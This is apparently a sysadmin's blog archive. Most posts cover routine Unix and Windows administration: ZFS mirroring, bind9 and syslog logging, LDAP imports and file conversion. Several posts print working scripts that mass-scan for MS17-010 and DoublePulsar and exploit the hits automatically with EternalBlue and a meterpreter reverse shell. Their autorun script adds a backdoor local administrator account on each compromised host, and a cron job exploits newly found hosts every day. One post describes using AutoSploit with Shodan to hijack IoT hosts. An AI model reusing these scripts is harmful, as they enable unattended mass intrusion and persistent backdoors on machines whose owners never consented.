<find vuln hosts>
#!/bin/bash
VULNHOSTS=/root/doublepulsar.scan/VULNHOSTS
TIMESTAMP=$(date "+%Y%m%d")
cd /root/doublepulsar.scan/VULNHOSTS/
msfconsole -x "color false ; vulns -o /root/doublepulsar.scan/VULNHOSTS/vulns.msf ; exit"
sort -u $VULNHOSTS/vulns.msf > $VULNHOSTS/vulns.msf.o
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' $VULNHOSTS/vulns.msf.o > $VULNHOSTS/vulns.msf.ip
sort -u $VULNHOSTS/vulns.msf.ip > $VULNHOSTS/vulnerablehosts.$TIMESTAMP
for file in $(find . -mtime 1); do
sdiff "$file" vulnerablehosts.$TIMESTAMP | grep '>' >> changes.$TIMESTAMP
done
mail -s "vulnerable hosts $TIMESTAMP" me@hell < vulnerablehosts.$TIMESTAMP
mail -s "vulnerable hosts difference $TIMESTAMP" me@hell < changes.$TIMESTAMP
#rm -rf $VULNHOSTS/vulns.*
#rm $VULNHOSTS/changes.$TIMESTAMP
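the find/sdiff loop above boils down to one question: which hosts are in today's sorted list but not in an older one? a minimal sketch of that step with comm, on made-up demo files:

```shell
#!/bin/bash
# comm -13 suppresses lines unique to file1 (yesterday) and lines
# common to both, leaving only hosts that appear for the first time.
# both inputs must be sorted, which the sort -u steps guarantee.
printf '10.0.0.1\n10.0.0.2\n' > /tmp/hosts.yesterday
printf '10.0.0.1\n10.0.0.2\n10.0.0.3\n' > /tmp/hosts.today
comm -13 /tmp/hosts.yesterday /tmp/hosts.today
```

prints the one new host, 10.0.0.3.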
<post report, exploit>
#!/bin/bash
PROCESS=/root/doublepulsar.scan/exploit
THEWICKED=/root/doublepulsar.scan/VULNHOSTS
TODAY=$(date '+%Y%m%d')
YESTERDAY=$(date -d "yesterday" '+%Y%m%d')
TOMORROW=$(date -d "next day" '+%Y%m%d')
WORK=/root/.msf4
cd $PROCESS/
mkdir $PROCESS/logs/$TODAY
cp $WORK/thewicked $WORK/thewicked.$TODAY
cp $THEWICKED/vulnerablehosts.$TODAY $WORK/thewicked
#hack em
cd /root/.msf4
msfconsole -x "color false ; jobs -K ; resource doublepulsar-loop.rc ; exit"
cd /root/.msf4/logs/sessions
ls | grep $TODAY | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > $PROCESS/exploited.$TODAY
mkdir -p $PROCESS/$TODAY
mv /root/.msf4/logs/sessions/*.log $PROCESS/$TODAY
mail -s "doublepulsar vuln hosts exploited $TODAY" me@hell < $PROCESS/exploited.$TODAY
exit
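the exploited.$TODAY step is just grepping IPs out of session-log filenames; a tiny demo of that extraction on a fabricated log name (the real names come from metasploit's session logger):

```shell
#!/bin/bash
# pull dotted-quad IPs out of filenames; the grep -o pattern is the
# same one the script uses. the log name here is fabricated.
mkdir -p /tmp/sessdemo
touch /tmp/sessdemo/20181030_10.0.0.5_session.log
ls /tmp/sessdemo | grep 20181030 \
| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
```

prints 10.0.0.5.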
Tuesday, October 30, 2018
automate ms010-17 exploitation better
Wednesday, September 26, 2018
automate exploiting newly-found doublepulsar vulnerable hosts
i've written about how to automate discovery. let's go to the next level and automate
reporting on and exploiting newly-discovered doublepulsar vulnerable hosts.
this assumes you have a previously created list of vulnerable hosts which
we're diffing against.
#!/bin/bash
PROCESS=/root/doublepulsar.scan/exploit
TODAY=$(date '+%Y%m%d')
YESTERDAY=$(date -d "yesterday" '+%Y%m%d')
cd $PROCESS/
#dump vulns
msfconsole -x "color false ; vulns -o $PROCESS/vulndetect.$TODAY ; exit"
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' $PROCESS/vulndetect.$TODAY \
> $PROCESS/vulnparsed.$TODAY
diff -u $PROCESS/vuln.$YESTERDAY $PROCESS/vulnparsed.$TODAY | grep '^+' | grep -v '^+++' \
| sed 's/^+//' > $PROCESS/vuln.$TODAY
msfconsole -x "color false ; spool $PROCESS/output.$TODAY ; use auxiliary/scanner/smb/smb_version;
set RHOSTS file:$PROCESS/vuln.$TODAY ; set THREADS 100; run; exit"
echo $TODAY > $PROCESS/mail.$TODAY
cat $PROCESS/vuln.$TODAY $PROCESS/output.$TODAY >> $PROCESS/mail.$TODAY
mail -s "new doublepulsar vuln hosts $TODAY " me@in.hell < $PROCESS/mail.$TODAY
rm $PROCESS/vulnparsed.*
rm $PROCESS/vulndetect.*
rm $PROCESS/mail.$TODAY
cp $PROCESS/vuln.$TODAY /root/.msf4/thewicked
#hack em
pkill -9 -f msfconsole
msfconsole -x "color false ; resource /root/.msf4/doublepulsar-loop.rc ; exit"
ls /root/.msf4/logs/sessions | grep $TODAY \
|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > $PROCESS/exploited.$TODAY
mail -s "new doublepulsar vuln hosts exploited $TODAY " me@in.hell < $PROCESS/exploited.$TODAY
rm $PROCESS/exploited.$TODAY
exit
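the diff/grep chain above is pulling the added lines out of a unified diff. the same extraction, demoed on throwaway files:

```shell
#!/bin/bash
# in unified diff output, added lines start with a single '+';
# the '+++' file header is the only other line that matches, so
# drop it, then strip the leading marker.
printf 'a\nb\n' > /tmp/old
printf 'a\nb\nc\n' > /tmp/new
diff -u /tmp/old /tmp/new | grep '^+' | grep -v '^+++' | sed 's/^+//'
```

prints c, the one added line.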
Monday, September 24, 2018
no raid-1? try zfs-mirror in sol11. but wait...
i installed solaris 11.14 on a decade-old system. i was really happy it installed. and then i remembered:
i was not given the option to mirror anything. it just installed and i clicked f2 f2 f2.
i want to set up something like raid-1. this is solaris, so i can do zfs mirroring. good enough. oh, i did an install over an old system, so yeah, there's that.
what i ended up doing was grabbing the partition table from the first (zfs-pool-holding) disk and writing it over that of the second disk, since my re-label command was ignored. after that, i created my mirror pool and all was well with the world.
zpool status rpool
  pool: rpool
 state: ONLINE
  scan: none requested
config:

        NAME                       STATE  READ WRITE CKSUM
        rpool                      ONLINE    0     0     0
          c0t5000CCA022532534d0s0  ONLINE    0     0     0

errors: No known data errors
only disk in rpool: c0t5000CCA022532534d0s0
[root@blackhole ~]# format
Searching for disks...done
AVAILABLE DISK SELECTIONS:
0. c0t5000CCA022532534d0 <HITACHI-H109030SESUN300G-A31A-279.40GB> solaris
/scsi_vhci/disk@g5000cca022532534
/dev/chassis/SYS/HDD0/disk
1. c0t5000CCA022543154d0 <HITACHI-H109030SESUN300G-A31A-279.40GB> solaris
/scsi_vhci/disk@g5000cca022543154
/dev/chassis/SYS/HDD1/disk
disk 1 is the second disk. verify it has Part 0. it does!
[root@blackhole ~]# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0
vdev verification failed: use -f to override the following errors:
/dev/dsk/c0t5000CCA022543154d0s0 contains a ufs filesystem.
Unable to build pool from specified devices: device already in use
Nope.
format -e
<select 1>
format > p [Partition editor]
format > label
Specify Label type[0]: 0
Ready to label disk, continue? y
root@blackhole:~# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0
cannot attach c0t5000CCA022543154d0s0 to c0t5000CCA022532534d0s0: device is too small
Still nope.
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022532534d0s0
* /dev/dsk/c0t5000CCA022532534d0s0 (volume "solaris") partition map
*
* Dimensions:
* 512 bytes/sector
* 625 sectors/track
* 20 tracks/cylinder
* 12500 sectors/cylinder
* 46875 cylinders
* 46873 accessible cylinders
*
* Flags:
* 1: unmountable
* 10: read-only
*
*                            First      Sector       Last
* Partition  Tag  Flags     Sector       Count      Sector  Mount Directory
      0       2    00            0   585912500   585912499
      2       5    01            0   585912500   585912499
okay.
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022543154d0s0
* /dev/dsk/c0t5000CCA022543154d0s0 (volume "solaris") partition map
*
* Dimensions:
* 512 bytes/sector
* 625 sectors/track
* 20 tracks/cylinder
* 12500 sectors/cylinder
* 46875 cylinders
* 46873 accessible cylinders
*
* Flags:
* 1: unmountable
* 10: read-only
*
*                            First      Sector       Last
* Partition  Tag  Flags     Sector       Count      Sector  Mount Directory
      0       2    00            0      262500      262499
      1       3    01       262500      262500      524999
      2       5    01            0   585912500   585912499
      6       4    00       525000   585387500   585912499
NOT okay.
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022532534d0s0 > /tmp/dsk0-part.dump
root@blackhole:~# fmthard -s /tmp/dsk0-part.dump /dev/rdsk/c0t5000CCA022543154d0s0
fmthard: New volume table of contents now in place.
Verify the VTOC on c0t5000CCA022543154d0s0. We're going to do something wicked.
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022543154d0s0
* /dev/dsk/c0t5000CCA022543154d0s0 (volume "solaris") partition map
*
* Dimensions:
* 512 bytes/sector
* 625 sectors/track
* 20 tracks/cylinder
* 12500 sectors/cylinder
* 46875 cylinders
* 46873 accessible cylinders
*
* Flags:
* 1: unmountable
* 10: read-only
*
*                            First      Sector       Last
* Partition  Tag  Flags     Sector       Count      Sector  Mount Directory
      0       2    00            0   585912500   585912499
      2       5    01            0   585912500   585912499
This is okay.
root@blackhole:~# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0
Make sure to wait until resilver is done before rebooting.
This is much better.
root@blackhole:~# zpool status rpool
  pool: rpool
 state: ONLINE
  scan: resilvered 21.9G in 2m52s with 0 errors on Mon Sep 24 15:39:51 2018
config:

        NAME                         STATE  READ WRITE CKSUM
        rpool                        ONLINE    0     0     0
          mirror-0                   ONLINE    0     0     0
            c0t5000CCA022532534d0s0  ONLINE    0     0     0
            c0t5000CCA022543154d0s0  ONLINE    0     0     0

errors: No known data errors
This is much much better.
root@blackhole:~# zpool list rpool
NAME   SIZE  ALLOC  FREE  CAP  DEDUP  HEALTH  ALTROOT
rpool  278G  38.2G  240G  13%  1.00x  ONLINE  -
We are golden!
Saturday, September 22, 2018
macos split all the jpgs in a directory in half
find . -name "*.jpg" | while read i; do convert "$i" -crop 50%x100% +repage "$i"; done
a play on:
convert input.png -crop 50%x100% +repage input.png
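one caveat: piping find into read splits on whitespace, so filenames with spaces get mangled. a hedged sketch of the null-delimited variant, with echo standing in for convert so it can be dry-run:

```shell
#!/bin/bash
# -print0 plus read -r -d '' keeps odd filenames intact,
# and IFS= preserves leading whitespace. echo stands in for
# the convert command from the one-liner above.
mkdir -p /tmp/splitdemo
touch /tmp/splitdemo/a.jpg "/tmp/splitdemo/b c.jpg"
find /tmp/splitdemo -name "*.jpg" -print0 | while IFS= read -r -d '' i; do
  echo "would split: $i"
done
```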
Monday, September 17, 2018
macos terminal convert pdf to jpg
find . -name "*.pdf" | while read filename; do fileconvert=$(echo "$filename" | sed 's/\.pdf$/.jpg/'); sips -s format jpeg "$filename" --out "$fileconvert"; done
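a caveat on the sed rename: a global "s/pdf/jpg/g" rewrites every 'pdf' in the path, not just the extension, so a directory named pdfs/ would get renamed too. bash parameter expansion only touches the suffix (demo path is made up):

```shell
#!/bin/bash
# ${filename%.pdf} strips only the trailing .pdf, leaving any
# 'pdf' earlier in the path alone.
filename="/tmp/pdfs/report.pdf"
fileconvert="${filename%.pdf}.jpg"
echo "$fileconvert"
```

prints /tmp/pdfs/report.jpg.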
Thursday, August 16, 2018
remotely exploit a number of hosts with metasploit via eternalblue
in a previous post i have mentioned how to do a scan for doublepulsar infected hosts and how to feed these hosts to msf. that's fine. but, i guess mass-exploiting those hosts is of some utility, too.
## msfconsole
msf > vulns -R
… a lot of text … look at end of output for a file dropped in /tmp e.g. ...
RHOSTS => file:/tmp/msf-db-rhosts-20180816-27096-ncow7k
msf > exit
# cd ~/.msf4/
# cp /tmp/msf-db-rhosts-20180816-27096-ncow7k thewicked
# msfconsole -r doublepulsar-loop.rc
Once all has completed, look through ~/.msf4/logs/doublepulsar.log for adminuser,
as those hosts have had the local admin user for your evil created.
## files
[doublepulsar-loop.rc]
<ruby>
# the rhosts from vuln_db
hostsfile="/root/.msf4/thewicked"
hosts=[]
File.open(hostsfile,"r") do |f|
f.each_line do |line|
hosts.push line.strip
end
end
# msfconsole commands with chained post exploit
self.run_single("resource /root/.msf4/doublepulsar.rc")
# the rhosts loop
hosts.each do |rhost|
self.run_single("set rhost #{rhost}")
self.run_single("exploit")
self.run_single("sleep 2")
end
</ruby>
[doublepulsar.rc]
spool /root/.msf4/logs/doublepulsar.log
set consolelogging true
set loglevel 5
set sessionlogging true
set timestampoutput true
use exploit/windows/smb/ms17_010_eternalblue
set VerifyArch False
set VerifyTarget False
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST
set AUTORUNSCRIPT multiscript -rc /root/.msf4/doublepulsar-lsadmin
[doublepulsar-lsadmin]
execute -H -f cmd.exe -a "/c net user adminuser badpassword /add"
execute -H -f cmd.exe -a "/c net localgroup administrators adminuser /add"
execute -H -f cmd.exe -a "/c bitsadmin task to download a scheduled task to patch and reboot"
exit
Monday, August 13, 2018
one-off doublepulsar scan script because sometimes people need to do one thing and one thing only
so yeah.
#!/bin/bash
EXECUTE=$(date "+%Y%m%d")
read -p "Enter IP to evaluate: " IP
if [[ $IP =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
read -p "Enter email address (or not): " EMAIL
else echo "Not a valid IP" && exit 0
fi
rm -rf /tmp/$IP
mkdir /tmp/$IP
cd /tmp/$IP
#msfconsole
sudo msfconsole -x "color false ; banner false ; spool /tmp/$IP/output.msf ; use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS $IP ; run; exit"
sed 's/]\ /\\\n/g' /tmp/$IP/output.msf | sed -r '/Error|NOT|properly|Script|\[|\]/d' | sed 's/:445//g' | sed '/-/!d' |sort -u > /tmp/$IP/output.msf.1
sed '/VULNERABLE/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.VULN
sed '/INFECTED/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.INFECTED
clear
if [ -s /tmp/$IP/output.msf.INFECTED ]
then
echo " Uh oh $IP DoublePulsar infected"
mail -s " $IP DoublePulsar infected " $EMAIL < /tmp/$IP/output.msf.INFECTED
mail -s " $IP DoublePulsar infected $EXECUTE " youreffingsysadmin@hell.com < /tmp/$IP/output.msf.1
else
echo " Phew $IP not infected "
fi
if [ -s /tmp/$IP/output.msf.VULN ]
then
echo " Sigh $IP DoublePulsar vulnerable "
mail -s " $IP DoublePulsar vulnerable " $EMAIL < /tmp/$IP/output.msf.1
else
echo " Double Phew $IP not DoublePulsar vulnerable"
fi
cd /tmp
rm -rf /tmp/$IP
exit 0
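a gap worth knowing about: the regex check above happily accepts 999.999.999.999. a hedged sketch of a stricter helper (valid_ip is a made-up name, not part of the script):

```shell
#!/bin/bash
# the regex checks the shape; the loop range-checks each octet.
# 10#$octet forces base 10 so an octet like 08 isn't parsed as octal.
valid_ip() {
  local IFS=. octet
  [[ $1 =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]] || return 1
  for octet in $1; do
    (( 10#$octet <= 255 )) || return 1
  done
}
valid_ip 10.0.0.1 && echo "10.0.0.1 ok"
valid_ip 999.1.1.1 || echo "999.1.1.1 rejected"
```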
Friday, July 20, 2018
cron job for doublepulsar detection, burning, metasploit scan, and email of results
double pulsar is a major drag. it is a nasty worm that hangs out and acts as a backdoor on a system. it is propagated by smbv1 trans2 calls. fun stuff. i needed to figure out how to automate discovery, burning, and identification of vulnerable systems. oh, and email me the results.
here's what i came up with:
$ dpkg-reconfigure exim4-config
$ apt-get install msf
$ searchsploit -u
$ apt-get install masscan
$ git clone https://github.com/countercept/doublepulsar-detection-script.git
$ mkdir -p /root/scripts
$ mkdir -p /root/to.process
$ echo "." > /root/to.process/empty
-- script doublepulsar.cron in /root/scripts --
#!/bin/bash
NETWORKRANGE=6.6.6.0/24
PROCESS=/root/to.process
EXECUTE=$(date "+%Y%m%d")
NAME=HELL
cd $PROCESS
#masscan
masscan -p445 $NETWORKRANGE > $PROCESS/output.masscan
sed -i "s/^.* on //" $PROCESS/output.masscan
#detect
/root/doublepulsar-detection-script/detect_doublepulsar_smb.py --file \
$PROCESS/output.masscan --uninstall --threads 100 --timeout 2 > \
$PROCESS/output.detect
sed '/DETECTED/!d' $PROCESS/output.detect > $PROCESS/output.detect.INFECTED
#msfconsole
msfconsole -x "color false ; spool $PROCESS/output.msf ; \
use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS file:$PROCESS/output.masscan ; set THREADS 100; run; exit"
sed 's/]\ /\\\n/g' $PROCESS/output.msf | sed -r '/Error|NOT|properly|Script|\[|\]/d' | sed 's/:445//g' | sed '/-/!d' | sort -u > $PROCESS/output.msf.1
sed '/VULNERABLE/!d' $PROCESS/output.msf.1 > $PROCESS/output.msf.VULN
sed '/INFECTED/!d' $PROCESS/output.msf.1 > $PROCESS/output.msf.INFECTED
#mail
if [ -s $PROCESS/output.detect.INFECTED ]
then
mail -s "DoublePulsar Detect Infected Hosts $NETWORKRANGE" me@here < $PROCESS/output.detect.INFECTED
else
mail -s "No DoublePulsar Detect Infected Hosts $NETWORKRANGE" me@here < $PROCESS/empty
fi
if [ -s $PROCESS/output.msf.INFECTED ]
then
cat $PROCESS/output.msf.INFECTED $PROCESS/output.msf.VULN >> $PROCESS/output.msf.INFECTEDVULN
mail -s "DoublePulsar MetaSploit Infected and Vulnerable Hosts $NETWORKRANGE" me@here < $PROCESS/output.msf.INFECTEDVULN
else
mail -s "No DoublePulsar MetaSploit Vulnerable Hosts $NETWORKRANGE" me@here < $PROCESS/empty
fi
#cleanup
mkdir -p $PROCESS/$NAME/$EXECUTE
mv output.* $PROCESS/$NAME/$EXECUTE
exit
-- end script --
run it every night, every hour, whenever. put it in /etc/crontab:
# evil
30 12 * * * root /root/scripts/doublepulsar.cron
the joy of the script is that, with all the text processing, it can be piped to syslog. so yeah, old news for you...
Thursday, March 22, 2018
nis master server settings on cloned system
i need to change nis master server settings on cloned system. don't even ask.
commands:
# domainname <newdomainname>
# mv /var/yp/<domainname> /var/yp/<newdomainname>
edit:
/etc/hosts change <hostname> to <newhostname> ; <ip> to <newip>
/etc/conf.d/net change <domainname> to <newdomainname>
/etc/yp.conf change <domainname> to <newdomainname>
/etc/ypserv.conf
/etc/ypserv.securenets
/var/yp/ypservers change <hostname> to <newhostname>
make -C /var/yp
test:
# ypwhich
Should return <newhostname>
# ypcat passwd | grep <username>
# ypcat group | grep <groupname>
Both should return known results
Wednesday, March 7, 2018
put pubkeys on a lot of hosts
i need to zap authorized_keys *all over the place*
this concatenates a file which contains several id_rsa.pub keys.
nodes is a long list of ip addresses.
#!/bin/bash
for i in `cat nodes` ; do
cat authorized_keys.add | ssh -o ConnectTimeout=5 -o StrictHostKeyChecking=no -o \
UserKnownHostsFile=/dev/null -t -t -t -l root $i 'cat >> /root/.ssh/authorized_keys'
done
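on a long node list the serial loop crawls. a hedged sketch of the same push fanned out ten-wide with xargs -P (echo stands in for the ssh pipeline so this can be dry-run):

```shell
#!/bin/bash
# push one host; for the real thing, replace the echo with the
# cat | ssh ... 'cat >> /root/.ssh/authorized_keys' pipeline above.
push() {
  echo "pushed to $1"
}
export -f push
printf '10.0.0.1\n10.0.0.2\n10.0.0.3\n' > /tmp/nodes   # demo node list
xargs -P10 -I{} bash -c 'push "$1"' _ {} < /tmp/nodes
```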
Thursday, February 8, 2018
when crond is using /bin/sh
crond uses sh by default, and the tee process substitution in that last cron script i posted breaks under sh. do this:
0 12 * * * root script.sh 2>&1 | bash -c 'tee >(/usr/bin/logger -p local6.notice -t script_tag ) >(mail -s "script output" me@here) >/dev/null'
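alternatively, many cron implementations let you set the shell for the whole crontab, so process substitution works without the bash -c wrapper. a hedged sketch (check that your crond honors SHELL before leaning on it):

```
SHELL=/bin/bash
0 12 * * * root script.sh 2>&1 | tee >(/usr/bin/logger -p local6.notice -t script_tag ) >(mail -s "script output" me@here) >/dev/null
```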
Monday, February 5, 2018
debug rsyslogd
why isn't rsyslogd sending anything out?
window 1 $ tcpdump udp dst port 514
window 2 $ logger -n 6.6.6.6 -P 514 "hello god"
<no answer>
hmm. let's debug rsyslogd
$ export RSYSLOG_DEBUGLOG="/tmp/debuglog"
$ export RSYSLOG_DEBUG="Debug"
$ service rsyslog stop
$ rsyslogd -d | head -10
7160.005597645:7fae096a3780: rsyslogd 7.2.6 startup, module path '', cwd:/root
7160.005872662:7fae096a3780: caller requested object 'net', not found (iRet -3003)
7160.005895004:7fae096a3780: Requested to load module 'lmnet'
7160.005906331:7fae096a3780: loading module '/lib64/rsyslog/lmnet.so'
7160.006023505:7fae096a3780: module lmnet of type 2 being loaded (keepType=0).
7160.006030872:7fae096a3780: entry point 'isCompatibleWithFeature' not present in module
7160.006033780:7fae096a3780: entry point 'setModCnf' not present in module
7160.006036209:7fae096a3780: entry point 'getModCnfName' not present in module
7160.006038359:7fae096a3780: entry point 'beginCnfLoad' not present in module
bad modules.
recompile.
dump cron script output from stdin into remote syslog & mail
because i feel important the more mail i delete (but really need to archive it on a syslog server because, well, you know).
0 12 * * * root script.sh 2>&1 | tee >(/usr/bin/logger -p local6.notice -t script_tag ) >(mail -s "script output" me@here) >/dev/null
rsyslog configuration directive:
local6.*;*.* @6.6.6.6:514
(note: @@ forwards via tcp instead of udp)
Thursday, February 1, 2018
svn logs to syslog
make svn logs human readable and send off to a syslog server
in /etc/apache2/sites-enabled/000-svn
# set customlog variable
LogLevel warn
LogFormat "%{%Y-%m-%d %T}t %u@%h %>s repo:%{SVN-REPOS-NAME}e %{SVN-ACTION}e %B Bytes in %T Sec" svn_log
# customlog and send to syslog
CustomLog "|/usr/bin/tee -a /var/svn/logs/svn_logfile | /usr/bin/logger -thttpd -plocal6.notice" svn_log env=SVN-ACTION
in /etc/rsyslog.d/50-default.conf
local6.* @remotesyslog
what remote syslog shows:
2018-02-01 16:34:45 buildbot@6.6.6.6 207 repo:repos get-dir /hell r160669 props 575 Bytes in 0 Sec
what standard apache access logs see:
6.6.6.6 - buildbot [01/Feb/2018:16:34:45 -0500] "PROPFIND /svn/repos/hell HTTP/1.1" 207 397 "-" "SVN/6.6.6 (r40053) neon/0.66.0"
apache logs to syslog
get those apache logs to a remote syslog server
syslog
in /etc/apache2/sites-enabled/000-site
ErrorLog "|/usr/bin/tee -a /var/log/apache2/error.log | /usr/bin/logger -thttpd -plocal6.err"
CustomLog "|/usr/bin/tee -a /var/log/apache2/access.log | /usr/bin/logger -thttpd -plocal6.notice" combined
in /etc/syslog.conf
local6.* @remoteserver
rsyslog
$ModLoad imfile
$InputFilePollInterval 10
$PrivDropToGroup adm
$WorkDirectory /var/spool/rsyslog
# Apache access file:
$InputFileName /var/log/apache2/access.log
$InputFileTag apache-access:
$InputFileStateFile stat-apache-access
$InputFileSeverity info
$InputFilePersistStateInterval 20000
$InputRunFileMonitor
#Apache Error file:
$InputFileName /var/log/apache2/error.log
$InputFileTag apache-error:
$InputFileStateFile stat-apache-error
$InputFileSeverity error
$InputFilePersistStateInterval 20000
$InputRunFileMonitor
what syslog gets:
<181>Feb 1 15:33:44 gallup httpd: 6.6.6.6 - - [01/Feb/2018:15:33:44 -0500] "GET /url/index.php HTTP/1.1" 200 20025 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
autosploit... one more thing to worry about
yay autosploit! for making things interesting.
this is a nice addition to the tools i have on my kali instance.
the important thing to do is:
pip install shodan
pip install blessings
if you want to be a script kiddie and hack IoT, register with shodan.io and get your api key.
msf modules are not automated, they're predefined here:
$autosploitpwd/modules.txt
as everyone knows, this application scans the shodan.io database of "Internet of Things" and creates a
random list of 6000 IPs to potentially exploit.
you can forego shodan.io's list and create your own targeted list of systems to hijack.
touch $autosploitpwd/hosts.txt
since it needs a listening local port, i set up an nc listener
nc -l 123
AutoSploit then quickly checks the ports on the hosts on the list (yours or shodan.io's).
you are then presented with the option to hijack the hosts using the Metasploit modules defined above.
i decided to smash a system that's being retired...
[*] Added workspace: autosploit
LHOST => me
LPORT => 123
VERBOSE => true
THREADS => 100
RHOSTS => sadhost
[-] Exploit failed: The following options failed to validate: RHOST.
[*] Exploit completed, but no session was created.
no joy. but! i will find one...
Tuesday, January 30, 2018
import ldap db dump
you have an ldap db dump called import.ldif. you need to replace
an existing ldap database with import.ldif. do this:
#!/bin/bash
TIMESTAMP=$(date '+%Y%m%d%H%M')
/etc/init.d/slapd stop ;
mv /var/lib/ldap /var/lib/ldap-$TIMESTAMP ;
mkdir /var/lib/ldap ;
cp /etc/ldap/DB_CONFIG /var/lib/ldap ;
slapadd -c -l /tmp/import.ldif ;
chown -R openldap.openldap /var/lib/ldap ;
/etc/init.d/slapd start
Friday, January 26, 2018
bind9 logging reprise
in a previous post i mentioned how to do bind9 logging.
i found there was too much information in the single file.
instead, i have culled out the different notices in to separate files.
for logrotate, since all the log files are in one directory, all you
need to do is place a wildcard attribute in the configuration file.
and apparmor may hate you and deny you the ability to create logs.
if you're like me and like logs to be created under the daemon's name
e.g. /var/log/bind for bind...
edit:
/etc/apparmor.d/usr.sbin.named
and give it /var/log/bind/** rw,
as opposed to /var/log/named/** rw,
# bind.local.log
logging {
channel query_log {
file "/var/log/bind/query.log" versions 3 size 5m;
// Set the severity to dynamic to see all the debug messages.
print-category yes;
print-severity yes;
print-time yes;
severity dynamic;
};
channel update_debug {
file "/var/log/bind/update_debug.log" versions 3 size 5m;
severity debug ;
print-category yes;
print-severity yes;
print-time yes;
};
channel security_info {
file "/var/log/bind/security_info.log" versions 3 size 5m;
severity info;
print-category yes;
print-severity yes;
print-time yes;
};
channel bind_log {
file "/var/log/bind/bind.log" versions 3 size 5m;
severity info;
print-category yes;
print-severity yes;
print-time yes;
};
category queries {
query_log;
};
category security {
security_info;
};
category update-security {
update_debug;
};
category update {
update_debug;
};
category lame-servers {
null;
};
category default {
bind_log;
};
};
# /etc/logrotate.d/bind
/var/log/bind/*.log {
daily
missingok
rotate 7
compress
delaycompress
notifempty
create 644 bind bind
postrotate
/usr/sbin/invoke-rc.d bind9 reload > /dev/null
endscript
}
Tuesday, January 23, 2018
flush rndc
my bind9 dns server is reporting different ips for a host when i...
localhost $ dig @localhost.ip address
and
remotehost $ dig @localhost.ip address
this is due to a weirdo cache on localhost.
the best thing to do is flush the dns cache.
localhost $ rndc flush
easy.
bind9 logs be freed of syslog
I want to know who is requesting what on my bind9 server.
Time to cull out those logs from /var/log/syslog .
$ vi /etc/bind/named.conf
just before named.conf.local , put in this line:
include "/etc/bind/named.conf.log";
$ vi /etc/bind/named.conf.log
logging {
channel bind_log {
file "/var/log/bind/bind.log" versions 3 size 5m;
severity info;
print-category yes;
print-severity yes;
print-time yes;
};
category default { bind_log; };
category update { bind_log; };
category update-security { bind_log; };
category security { bind_log; };
category queries { bind_log; };
category lame-servers { null; };
};
see that directory? create it and perm it
$ mkdir /var/log/bind ; chown bind:bind /var/log/bind
your logs will be large with all that debug stuff. rotate them!
$ vi /etc/logrotate.d/bind
/var/log/bind/bind.log {
daily
missingok
rotate 7
compress
delaycompress
notifempty
create 644 bind bind
postrotate
/usr/sbin/invoke-rc.d bind9 reload > /dev/null
endscript
}
$ /etc/init.d/bind9 restart
excitement.
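one more habit worth keeping: assuming the stock bind tools are installed, named-checkconf will catch a typo in the logging clause before the restart does:

```
$ named-checkconf /etc/bind/named.conf
```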
Thursday, January 18, 2018
robocopy a local user profile between servers
robocopy c:\Users\source \\newserver\C$\Users\source *.* /mir /sec /r:1 /w:1 /LOG:C:\Mirlog.txt /XD "RECYCLER" "Recycled" "System Volume Information" /XF "desktop.ini" "thumbs.db"
get all ip addresses from netlogon.log and mail it
name this something.ps1 and run it to get all ip addresses from netlogon.log and mail them to yourself.
# Script to get the IP addresses of clients from the Netlogon.log file of all domain controllers in the current domain
# from the current month and the previous month
################################Start Functions####################################
function GetDomainControllers {
$DCs=[system.directoryservices.activedirectory.domain]::GetCurrentDomain() | ForEach-Object {$_.DomainControllers} | ForEach-Object {$_.Name}
return $DCs
}
function GetNetLogonFile ($server) {
#build Path variable
$path= '\\' + $server + '\c$\windows\debug\netlogon.log'
#Try to connect to $path and get the file contents or throw an error
try {$netlogon=get-content -Path $path -ErrorAction stop}
catch { "Can't open $path"}
#reverse the array's order so we are now working from the end of the file back
[array]::Reverse($netlogon)
#clear out the holding variable
$IPs=@()
#go through the lines
foreach ($line in $netlogon) {
#split the line into pieces using a space as the delimiter
$splitline=$line.split(' ')
#Get the date stamp which is in the mm/dd format
$logdate=$splitline[0]
#split the date
$logdatesplit=($logdate.split('/'))
[int]$logmonth=$logdatesplit[0]
#only worry about the last month and this month
if (($logmonth -eq $thismonth) -or ($logmonth -eq $lastmonth)) {
#only push it into an array if it matches an IP address format
if ($splitline[5] -match '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'){
$objuser = new-object system.object
$objuser | add-member -type NoteProperty -name IPaddress -value $splitline[5]
$objuser | add-member -type NoteProperty -name Computername -value $splitline[4]
$objuser | add-member -type NoteProperty -name Server -value $server
$objuser | add-member -type NoteProperty -name Date -value $splitline[0]
$objuser | add-member -type NoteProperty -name Time -value $splitline[1]
$IPs+=$objuser
}
} else {
#break out of loop if the date is not this month or last month
break
}
}
return $IPs
}
###############################End Functions#######################################
###############################Main Script Block###################################
#Get last month's date
$thismonth=(get-date).month
$lastmonth=((get-date).addmonths(-1)).month
#get all the domain controllers
